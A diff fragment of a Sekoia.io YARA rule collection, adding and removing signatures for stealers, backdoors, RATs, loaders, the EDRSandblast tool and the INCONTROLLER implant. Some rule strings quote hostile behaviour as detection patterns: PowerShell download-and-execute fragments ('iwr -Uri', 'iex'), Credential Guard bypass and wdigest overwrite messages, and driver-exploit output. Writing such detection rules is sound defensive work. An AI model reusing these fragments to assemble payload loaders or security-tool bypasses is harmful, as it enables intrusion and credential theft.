+		$a3 = "[ <b>Wallets</b> ]" wide
+		$a4 = "[ <b>Messengers</b> ]" wide
+		$a5 = "[ <b>Applications</b> ]" wide
+		$a6 = "[ <b>Games</b> ]" wide
+		$a7 = "[ <b>Mails</b> ]" wide
+		$a8 = "[ <b>VPNs</b> ]" wide
+		$a9 = "[ <b>FTPs</b> ]" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 100KB and filesize < 300KB and any of ( $s* ) and any of ( $t* ) and any of ( $u* )
+		uint16be( 0 ) == 0x4d5a and filesize > 50KB and filesize < 200KB and 2 of ( $s* ) and 7 of ( $a* )
 }
-rule SEKOIA_Tool_Koblas_Server_Strings : FILE
+rule SEKOIA_Infostealer_Win_Whitesnake_Stealer_Feb23 : FILE
 {
 	meta:
-		description = "Detects Koblas server"
+		description = "Finds WhiteSnake samples (stealer module)"
 		author = "Sekoia.io"
-		id = "ebd891da-69dd-474c-9e08-63d0b4cc654e"
-		date = "2024-05-23"
+		id = "68ae7fbc-4486-4b60-af5e-f37ddc58f170"
+		date = "2023-03-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_koblas_server_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_whitesnake_stealer_feb23.yar#L1-L31"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "590f3f71564c347be7b3b2a583606c3854744d0023cde464374cd7b61ec5a2d7"
+		logic_hash = "90007c38c644b79b2a60d9a252bd95071c5be57c649d73b66a73a1158cddc2fb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257193,117 +257359,125 @@ rule SEKOIA_Tool_Koblas_Server_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "sent {sent} bytes and received {received} bytes" wide ascii
-		$ = "connection denied" ascii
-		$ = "loaded {} users" ascii
-		$ = "listening on {}:{} for incoming connections" ascii
+		$fun01 = "Ibhiyptxjhiacrnxomvqjb" ascii
+		$fun02 = "Irwcvmgzsduiiizaabbczm" ascii
+		$whi = "WhiteSnake.Properties.Resources" ascii
+		$str01 = "get_UtcNow" ascii
+		$str02 = "get_IPAddress" ascii
+		$str03 = "get_Ticks" ascii
+		$str04 = "set_commands" ascii
+		$str05 = "set_Information" ascii
+		$str06 = "set_filedata" ascii
+		$str07 = "get_Jpeg" ascii
+		$str08 = "set_Culture" ascii
+		$str09 = "MakeScreenshot" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 3 of them
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $fun* ) or $whi ) and 3 of ( $str* ) or 7 of ( $str* ) ) and filesize < 100KB
 }
-rule SEKOIA_Ursnif_Ldr4
+
+rule SEKOIA_Loader_Win_Ninerat
 {
 	meta:
-		description = "Ursnif LDR4"
+		description = "Detect the NineRAT instrumentator"
 		author = "Sekoia.io"
-		id = "73e63481-8a89-4342-87f0-8dc7ad459396"
-		date = "2024-12-19"
+		id = "b9aa3ddc-7892-402f-b045-182884ee9bad"
+		date = "2023-12-12"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ursnif_ldr4.yar#L1-L26"
+		reference = "https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_ninerat.yar#L4-L37"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6fe237c6370a1b99bddb7bee4170d29cbb780dc445f5d5039201ddbaf05c63db"
+		logic_hash = "eab81277a2ffe926c2d9f990ee2e36f0e5f27a14d3048c50d31952d90ce7ab0b"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4"
+		hash2 = "5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541"
 
 	strings:
-		$str1 = "LOADER.dll" fullword
-		$str2 = "DllRegisterServer" fullword
-		$str3 = ".bss" fullword
-		$x64_code1 = { 3D 2E 62 73 73 74 0A 48 83 C7 28 }
-		$x64_code2 = { 8B 17 48 83 C7 04 8B CA 8b C2 23 CB 0B C3 F7 D1 23 C8 41 2B CA 44 8B D2 41 89 08 41 8B CB 49 83 C0 04 83 E1 07 FF C1 41 D3 C2 41 83 EB 04 79 }
-		$x64_code3 = { 41 0F B6 01 49 FF C1 8B C8 8B D0 83 E1 03 C1 E1 03 D3 E2 44 03 C2 41 83 C2 FF 75 }
-		$x64_code4 = { 45 8D 45 08 48 8D 8C 24 [4] BA 30 00 FE 7F E8 }
-		$x64_code5 = { 48 8D 8C 24 [4] BA 30 00 FE 7F 41 B8 08 00 00 00 E8 }
-		$x86_code1 = { 81 F9 2E 62 73 73 74 09 83 C6 28 }
-		$x86_code2 = { 8B 06 8B D0 23 55 0C 8B D8 0B 5D 0C F7 D2 23 D3 2B D1 8A 4D 08 80 E1 07 83 C6 04 89 17 83 C7 04 FE C1 D3 C0 83 6D 08 04 8B C8 79 }
-		$x86_code3 = { 8A 0E 0F B6 D1 8B CA 83 E1 03 C1 E1 03 D3 E2 46 03 C2 4F 75 }
-		$x86_code4 = { 6A 08 8D 45 F8 68 30 00 FE 7F 50 E8 }
+		$ = "TelegramRat\\lastest\\Dropper"
+		$ = "\\Release\\ServiceMid.pdb"
 
 	condition:
-		true and 5 of them
+		all of them or pe.imphash ( ) == "104a3dc970a385f64de39e0dad61a9a2" or hash.md5 ( pe.rich_signature.clear_data ) == "aab0aa6b89d883e42be8b65a4e41a139" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "827d5fd4b1a0426037529ee9bba48da0" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "82354f92508dcb33acda01c226de2975" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ccd0f5d837a6cc05a861f040cbdfe080" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "8d2c169356afe8b53b0ecb83de3084b9" )
 }
-
-rule SEKOIA_Backdoor_Win_Winordll64
+rule SEKOIA_Tool_Edrsandblast_Strings : FILE
 {
 	meta:
-		description = "Detect the WinorDLL64 backdoor"
+		description = "Detects EDRSandblast strings"
 		author = "Sekoia.io"
-		id = "86a32538-bc69-47ea-9842-4af360588c27"
-		date = "2023-02-24"
+		id = "7059b89c-80b5-4768-b3eb-02f173f628b0"
+		date = "2024-01-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_winordll64.yar#L4-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_edrsandblast_strings.yar#L1-L29"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "30e6f01f30d6ef11c75e133d309cebc87b69ede8eb38aa14d237760e99b52c54"
+		logic_hash = "8528c4c440734ba97b98b6e0857d95f38a91eaf9120ba2eacff292c864fb86a5"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$ = "[!] Cred Guard bypass failed: obtained invalid" wide
+		$ = "[!] Cred Guard bypass non fatal error:" wide
+		$ = "[+] Successfully overwrote wdigest's g_fParameter_UseLogonCredential" wide
+		$ = "[!] ERROR: could not allocate memory for the handl" wide
+		$ = "[+] [ProcessProtection] Found the handle of the current" wide
+		$ = "[+] [ProcessProtection] Found self process EPROCCES struct at" wide
+		$ = "ETW Threat Intel ProviderEnableInfo address could not be found." wide
+		$ = "The ETW Threat Intel provider was successfully" wide
+		$ = "[+] [NotifyRountines]" wide
+		$ = "[callback addr: 0x" wide
+		$ = "EDR / security products driver(s)" wide
+		$ = "Object callback offsets not loaded ! Aborting..." wide
+		$ = "No more space to store object callbacks !!" wide
+
 	condition:
-		hash.md5( pe.rich_signature.clear_data ) == "d16713cbfe04151b3a9e832c8afd55df" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3f638774c2565594029fb52ceb67db7a" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f9416bfb43b2c70837927e43e7591a2a" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6eede2cebaef39eec5bd1c24c809e3dc" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1177658fb0469cd5982102c9f3cd2eea" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "658d877d1bf0d2928b2c3efec9ec06cf" ) or pe.imphash ( ) == "d6b6f8cdffb06f469e06c7af9639897c"
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
 }
-
-rule SEKOIA_Dotnet_Injector_New_Payload : FILE
+rule SEKOIA_Backdoor_Oyster
 {
 	meta:
-		description = "New dotnet injector"
+		description = "Detects files related to the Oyster backdoor."
 		author = "Sekoia.io"
-		id = "b0a1d471-5381-4fa8-8563-7e72ecd15bed"
-		date = "2022-12-21"
+		id = "f95f98ea-1e52-45ae-8abf-a986f95d4ab2"
+		date = "2024-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/dotnet_injector_new_payload.yar#L3-L30"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_oyster.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8b5e2f6e7947471e10e0ec85eef1cebe1904c2e77b7cfe92e578ebe306041842"
+		logic_hash = "ffd84d0c7064bcd69121aa606bc642ff2b5c9927ba622260a02a9689c7ab8878"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$f1 = "DownloadFile" ascii
-		$f2 = "StreamReader" ascii
-		$f3 = "ReadToEnd" ascii
-		$f4 = "Reverse" ascii
-		$f5 = "Load" ascii
-		$f6 = "StringToByteArray" ascii
-		$s1 = "Admin" wide
-		$s2 = "User" wide
-		$p1 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" wide
-		$p2 = ".lnk" wide
+		$s1 = "CleanUp30.dll" ascii fullword
+		$s2 = "MSTeamsSetup_c_l_.exe" ascii fullword
 
 	condition:
-		filesize < 300KB and all of ( $f* ) and all of ( $s* ) and all of ( $p* ) and dotnet.is_dotnet
+		all of them
 }
-rule SEKOIA_Win_Malware_Agnianestealer : FILE
+
+rule SEKOIA_Implant_Win_Incontroller : FILE
 {
 	meta:
-		description = "Detect the Agniane stealer using strings"
+		description = "Detect the INCONTROLLER implant "
 		author = "Sekoia.io"
-		id = "704c85b7-8b82-4160-ae1b-fd1054cae8e2"
-		date = "2023-08-10"
+		id = "c346c6ea-c5c0-4e9f-a632-1e8ed0286fbc"
+		date = "2022-04-14"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/win_malware_agnianestealer.yar#L1-L18"
+		reference = "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_incontroller.yar#L4-L49"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0aa40fcb713ab40711108290e8274d783c1336a2c4c03eba2fcc4a44f2ebe39f"
+		hash = "69296ca3575d9bc04ce0250d734d1a83c1348f5b6da756944933af0578bd41d2"
+		logic_hash = "988e3004169817758a38dc7cd621ed351dac4de41e6dad03ab1cdfc07b8a6cac"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257311,96 +257485,83 @@ rule SEKOIA_Win_Malware_Agnianestealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Agniane.pdb" ascii
-		$s2 = "Agniane.exe" wide ascii
+		$ = "AsRockDrv.sys" ascii
+		$ = "C:\\Users\\User1\\Desktop\\dev projects\\SignSploit1\\x64\\Release\\AsrDrv_exploit.pdb" ascii
+		$ = "found map in %.3f sec physical address : %016I64x" ascii
+		$ = "get physical regions error : %x!"
+		$ = "Device AsrDrv103 was opened successefuly!" ascii
+		$ = "Ioctl handler AsrDrv103 was found successefuly!" ascii
+		$ = "cant open the AsrDrv103!" ascii
+		$ = "can't read a unsigned driver ! " ascii
+		$ = "cant drop and load exploatable driver ! " ascii
+		$ = "please set unsigned driver as argument to program!" ascii
+		$ = "\\DosDevices\\AsrDrv103" wide
+		$t = "This program cannot be run in DOS mode."
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a ) and filesize > 100KB and filesize < 3MB and 2 of them
+		( uint16( 0 ) == 0x5A4D and 4 of them and filesize < 800KB and #t == 2 ) or pe.imphash ( ) == "f139e860bc959a7e65a008399425c090" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "a2fe4d32d74354c391a283178f0291e6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c33f9caa68fe46c6996a928ba5a38fd6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d9a1f1a4d48906da1d9f33eae0f0eaef" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "76426b0209a87fa32ca28e9f2361be67" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "9e63a5064b755925598b8d72ace52dc9" ) or hash.md5 ( pe.rich_signature.clear_data ) == "140d7fb360dbebb03edab903b5d08285"
 }
-
-rule SEKOIA_Launcher_Win_Mistcloak : FILE
+rule SEKOIA_Apt_Susp_Lazarus_Dangerous_Password : FILE
 {
 	meta:
-		description = "Detect the MISTCLOAK malware"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "3dbf5efa-d77c-436a-a080-9ac58a78425f"
-		date = "2022-12-01"
+		id = "726c8b92-7fbe-40f8-917a-cabd206028da"
+		date = "2023-09-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/launcher_win_mistcloak.yar#L4-L33"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_susp_lazarus_dangerous_password.yar#L1-L15"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fc2731ec4e2917be1ad169908ed324931a93f6998aee606319750b5cc02715e2"
-		score = 75
+		logic_hash = "2b159266bd6bba20ffaa627dac840840eaaad98e7962f48bbae428e687155b3d"
+		score = 65
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\usb.ini"
-		$ = "autorun.inf\\Protection for Autorun\\System Volume Information"
-		$ = "G:\\project\\APT\\U"
-		$ = "\\new\\u2ec\\Release\\u2ec.pdb"
-		$ = "CheckUsbService"
+		$ = ".jpeg" wide
+		$ = "mshta"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them or hash.md5 ( pe.rich_signature.clear_data ) == "0f5082fd7ddd1950fa332a8fa4df052f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "0ceac625db1e8405efe45d47486e9e2d" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6968e6ac7b9c1dfbf40a0b3c4f6f4157" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e6ed2da41f74e948cba7a002c41c6af5" )
+		uint32be( 0 ) == 0x4c000000 and all of them and filesize < 5KB
 }
-rule SEKOIA_Loader_Latrodectus_Dll : FILE
+
+rule SEKOIA_Downloader_Win_Andarloader : FILE
 {
 	meta:
-		description = "Finds Latrodectus samples based on the specific strings"
+		description = "Detect the AndarLoader downloader used by Andariel"
 		author = "Sekoia.io"
-		id = "c60676ad-31cb-4f4d-9073-757a0ad7d23d"
-		date = "2023-12-08"
+		id = "96dd737e-601c-4370-9fa6-4bbafafae203"
+		date = "2023-09-04"
 		modified = "2024-12-19"
-		reference = "https://twitter.com/Myrtus0x0/status/1732997981866209550"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_latrodectus_dll.yar#L1-L35"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_andarloader.yar#L4-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "57aae1944eded14537cdc1c17b21cfc503687a416551b782fc76f8c7858e936e"
+		logic_hash = "33e5490b9564333c27a2c23d7f0362c582ca3bd352cafde6b334dc376fd37762"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$str01 = "c:\\temp\\debug.pdb" fullword ascii
-		$str02 = "Bottmp64.dll" fullword ascii
-		$str03 = "scab" fullword ascii
-		$str04 = "&wmic=" fullword ascii
-		$str05 = "&ipconfig=" fullword ascii
-		$str06 = "&systeminfo=" fullword ascii
-		$str07 = "&domain_trusts=" fullword ascii
-		$str08 = "&domain_trusts_all=" fullword ascii
-		$str09 = "&net_view_all_domain=" fullword ascii
-		$str10 = "&net_view_all=" fullword ascii
-		$str11 = "&net_group=" fullword ascii
-		$str12 = "&net_config_ws=" fullword ascii
-		$str13 = "&net_wmic_av=" fullword ascii
-		$str14 = "&whoami_group=" fullword ascii
-		$str15 = "\"subproc\": [" fullword ascii
-		$str16 = "&proclist=[" fullword ascii
-		$str17 = "&desklinks=[" fullword ascii
-		$str18 = "Update_%x" fullword wide
-		$str19 = "Custom_update" fullword wide
-		$str20 = "\\update_data.dat" fullword wide
+		hash1 = "02135f60f3edff0b9baa4c20715ee6a80c94f282079bf879265f5e020d37cf88"
+		hash2 = "54ed7a7430974cc2ea694f49f3e637b835dcd24aa19d66af854ad47b87068c92"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of them
+		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "b338ad077c7f5be85c33def7287198841d55af8cd1ad856fdcd16fdc78f18838" ) and filesize < 100KB
 }
-rule SEKOIA_Trojan_Android_Cerberus : FILE
+rule SEKOIA_Apt_Ir_Sugarush_Implant : FILE
 {
 	meta:
-		description = "Detect samples of the Android banking trojan Cerberus, or its family"
+		description = "Detects the SUGARUSH implant"
 		author = "Sekoia.io"
-		id = "3ea398bd-a80c-40f4-ad52-73b528add4ad"
-		date = "2022-01-24"
+		id = "bcf057cc-272c-4cb6-bb76-928788675282"
+		date = "2022-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_android_cerberus.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_ir_sugarush_implant.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "18109733d15c994015646e786a7c6177a1209200fd4c80042db3d48c97c02030"
+		logic_hash = "0d249552013c29ce1eb66dca2d93e5cde0a1b0fb80aae55469bec3bda224be91"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257408,30 +257569,27 @@ rule SEKOIA_Trojan_Android_Cerberus : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "assets/neurax.txt"
-		$str1 = "assets/Card_UpPotency_UI.json"
-		$str2 = "assets/Card_SignetFoster_UI.json"
-		$str3 = "assets/Gene_EmpathyTrainer.png"
-		$bin0 = "assets/180417.bin"
-		$bin1 = "assets/180513.bin"
-		$bin2 = "assets/180527.bin"
-		$bin3 = "assets/180528.bin"
+		$ = "You are offline at " wide
+		$ = "\\Logs\\ServiceLog_" wide
+		$ = "Service is recall at" wide
+		$ = "add_OutputDataReceived" ascii
+		$ = "get_CurrentDomain" ascii
 
 	condition:
-		uint32be( 0 ) == 0x504B0304 and filesize > 1MB and filesize < 4MB and 3 of ( $str* ) and 3 of ( $bin* )
+		uint16be( 0 ) == 0x4d5a and filesize < 100KB and all of them
 }
-rule SEKOIA_Merlin_Crossplatform : FILE
+rule SEKOIA_Apt_Sidecopy_Actionrat_Packer_Strings : FILE
 {
 	meta:
-		description = "Detects Merlin agent cross platform"
+		description = "Detects SideCopy's ActionRAT (packer?)"
 		author = "Sekoia.io"
-		id = "c9c57f5e-26c3-43be-b2cf-10f5129d3be6"
-		date = "2022-01-03"
+		id = "b9370bd5-12e1-448e-a5b1-2acc72adc4a7"
+		date = "2023-05-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/merlin_crossplatform.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sidecopy_actionrat_packer_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "975cc4fe0d89383188f9fd3c516d1e853dd6070d7703c0b5b5874dc1e7e6f32a"
+		logic_hash = "1bb6896ac3efa0e43cc27f56d7324ab9bdd2c401941eeefc4e7be62b407657af"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257439,32 +257597,29 @@ rule SEKOIA_Merlin_Crossplatform : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = ".CRT" ascii
-		$s2 = ".tls" ascii
-		$s3 = "github.com/Ne0nd0g/merlin" ascii
-		$s4 = "github.com/refraction-networking" ascii
-		$s5 = "SendMerlinMessage" ascii
-		$s6 = "ifconfigH9" ascii
+		$ = "(HTTP/1\\.[01]) (\\d{3})(?: (.*?))?"
+		$ = "cpp-httplib/0.7"
+		$ = "\\HTTP Arsanel\\"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and all of them and filesize > 5MB and filesize < 15MB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Apt29_Malicious_Rdp_File : FILE
+rule SEKOIA_Apt_Redhotel_Maliciouslnk_Strings : FILE
 {
 	meta:
-		description = "Detects malicious RDP files"
+		description = "Detects RedHotel's malicious LNKs"
 		author = "Sekoia.io"
-		id = "a7b092b5-53a1-4638-a6c1-733d3f063139"
-		date = "2024-10-25"
+		id = "df2f0002-7921-4378-a936-ea0de5fbfa5a"
+		date = "2024-09-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt29_malicious_rdp_file.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_redhotel_maliciouslnk_strings.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "db326d934e386059cc56c4e61695128e"
-		hash = "b38e7e8bba44bc5619b2689024ad9fca"
-		hash = "f58cf55b944f5942f1d120d95140b800"
-		hash = "40f957b756096fa6b80f95334ba92034"
-		logic_hash = "da9d8dfbbf82f48c8b880cbde21f75ecd1e9f779e462da5ced32b6587c71eaf2"
+		hash = "8e2c17040ec78cbcdc07bb2cf9dd7e01"
+		hash = "dc613a519e515ca817fdfb88f81fc9d7"
+		hash = "6f7d85c196c277a6a619f6d94b8f69b9"
+		hash = "b04d484d1e1d793b04af2a5fb88a8a57"
+		logic_hash = "c1d64b3eca5961d7eaab82a6934299642a70301ef791493a371ae5a29376225f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -257472,194 +257627,195 @@ rule SEKOIA_Apt_Apt29_Malicious_Rdp_File : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "RedirectPrinters" wide
-		$ = "RedirectCOMPorts" wide
-		$ = "RedirectSmartCards" wide
-		$ = "RedirectPOSDevices" wide
-		$ = "RedirectClipboard" wide
-		$ = "DrivesToRedirect" wide
-		$ = "full address:s:" wide
+		$ = "desktop-" ascii
+		$ = ".\\1.docx" wide
+		$ = ".\\1.pdf" wide
+		$ = ".\\1.doc" wide
+		$ = ".\\1.ppt" wide
+		$ = ".\\1.pptx" wide
+		$ = "MACOS" wide
 
 	condition:
-		uint16be( 0 ) == 0xFFFE and all of them and filesize < 20KB
+		uint32be( 0 ) == 0x4c000000 and 3 of them
 }
-rule SEKOIA_Loader_Fakebat_Initial_Powershell_May24 : FILE
+rule SEKOIA_Dropper_Win_Selfau3
 {
 	meta:
-		description = "Finds FakeBat initial PowerShell script downloading and executing the next-stage payload."
+		description = "Finds SelfAU3 Dropper samples based on specific strings"
 		author = "Sekoia.io"
-		id = "adf0e4fc-fa98-470b-9535-bd30d0bdb3aa"
-		date = "2024-05-28"
+		id = "2d005a54-b013-40e9-b88a-30454e4b22af"
+		date = "2024-02-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_fakebat_initial_powershell_may24.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/dropper_win_selfau3.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6a699df361b0cb2baf1d0b128f795aa9918ebe11daaeb1fa49aebf9320add762"
+		logic_hash = "5f69457127ae6cb84b04f72dd30393dbcf32b4ba26ec6d529eebcc03191cbed3"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
-		modification_date = "2024-06-21"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "='http" wide
-		$str02 = "=(iwr -Uri $" wide
-		$str03 = " -UserAgent $" wide
-		$str04 = " -UseBasicParsing).Content; iex $" wide
+		$sfx = "!Require Windows" ascii
+		$ins01 = ";!@Install@!UTF-8!" ascii
+		$set = {53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 3d 22 [1-15] 3d ?? 22}
+		$run = "RunProgram=\"hidcon:c" ascii
+		$ins02 = ";!@InstallEnd@!" ascii
 
 	condition:
-		3 of ( $str* ) and filesize < 1KB and true
+		$sfx at 77 and $set in ( @ins01 .. @ins01 + 500 ) and #set > 5 and $run in ( @set .. @set + 1000 ) and $ins02 in ( @run .. @run + 500 )
 }
-rule SEKOIA_Apt_Susp_Apt28_Uac0063_Hta_Loader
+rule SEKOIA_Vpn_Mul_Softether
 {
 	meta:
-		description = "Detects some suspected APT28 HTA loader"
+		description = "Detect the open-source SoftEther VPN"
 		author = "Sekoia.io"
-		id = "8e1889c1-c6ac-4048-9d3a-99ccbbd5435f"
-		date = "2024-07-25"
+		id = "a1fbf4fe-b934-4a66-b6b1-ebe2f83505cd"
+		date = "2024-04-15"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
